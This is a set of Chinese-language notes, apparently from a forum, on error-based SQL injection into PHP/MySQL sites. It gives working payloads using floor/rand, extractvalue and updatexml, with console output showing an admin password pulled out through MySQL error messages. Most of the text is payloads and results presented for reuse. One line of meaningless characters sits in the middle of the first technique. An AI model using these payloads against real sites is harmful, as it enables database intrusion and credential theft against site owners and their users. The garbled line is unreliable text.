放点原来的笔记,Mysql在执行语句的时候会抛出异常信息,而php+mysql架构的网站往往又将错误信息直接显示在页面上,这样可以通过构造如下三种方法获取特定数据。
实际测试环境:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下:
首先进行正常查询:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置的语句进行查询。
例如我们需要查询管理员用户名和密码:
Method1:
9 e8 o" x$ v, d' s4 g0 ? 9 K) q. H* C7 h6 |
: H$ G7 m3 t* ?' L; e" K4 e
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All thanks to foreign guys.